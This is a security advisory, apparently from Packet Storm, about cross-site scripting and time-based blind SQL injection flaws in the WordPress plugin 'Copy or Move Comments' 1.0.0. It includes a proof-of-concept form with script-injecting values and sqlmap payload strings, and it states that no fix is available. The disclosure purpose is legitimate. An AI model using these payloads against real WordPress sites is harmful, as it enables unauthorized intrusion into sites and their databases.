Lucene search
+L

WordPress Copy Or Move Comments 1.0.0 Cross Site Scripting

🗓️ 30 Jul 2015 00:00:00Reported by Morten NortoftType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

WordPress 'Copy or Move Comments' Plugin 1.0.0 Cross Site Scriptin

Code
`Title: WordPress 'Copy or Move Comments' Plugin   
Version: 1.0.0  
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej  
Date: 2015-06-16  
Download:   
- https://wordpress.org/plugins/copy-or-move-comments/  
- https://plugins.svn.wordpress.org/copy-or-move-comments/  
Notified WordPress: 2015-06-21  
==========================================================  
  
## Plugin description  
==========================================================  
Using Copy/Move WordPress Plugin the admin can copy or move any comment from several types of pages to any other page!  
  
## Vulnerabilities  
==========================================================  
Two POST parameters are printed unsanitized on the plugins admin page.  
  
PoC:  
Log in as admin and submit the following form:  
<form method="POST" action="[URL]/wp-admin/admin-ajax.php">   
<input type="text" name="action" value="get_all_posts" readonly><br />  
<input type="text" name="post_type" value="'</script><script> alert(1)</script>"><br />  
<input type="text" name="action_type" value="'</script><script> alert(2)</script>"><br />  
<input type="submit">  
</form>  
  
Some of the SQL queries are exploitable from the admin page.  
  
SQLMAP log snippet:  
POST parameter 'source_post' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y  
...  
POST parameter 'target_post' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y  
sqlmap identified the following injection points with a total of 174 HTTP(s) requests:  
---  
Parameter: source_post (POST)  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)  
Payload: option_page=copy-move-settings-group&action=update&_wpnonce=5fd9b35c58&_wp_http_referer=/projects  
/wp422/wp-admin//admin.php?page=copy-move%26error=1&copy-move=move&all_post_types=post&source_post=1 AND (SELE  
CT * FROM (SELECT(SLEEP(5)))HzuL)&move_comment_id[]=1&target_post=10&action=action_move  
  
Parameter: target_post (POST)  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)  
Payload: option_page=copy-move-settings-group&action=update&_wpnonce=5fd9b35c58&_wp_http_referer=/projects  
/wp422/wp-admin//admin.php?page=copy-move%26error=1&copy-move=move&all_post_types=post&source_post=1&move_comm  
ent_id[]=1&target_post=10 AND (SELECT * FROM (SELECT(SLEEP(5)))kBfe)&action=action_move  
---  
  
  
  
## Solution  
==========================================================  
No fix available  
  
==========================================================  
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation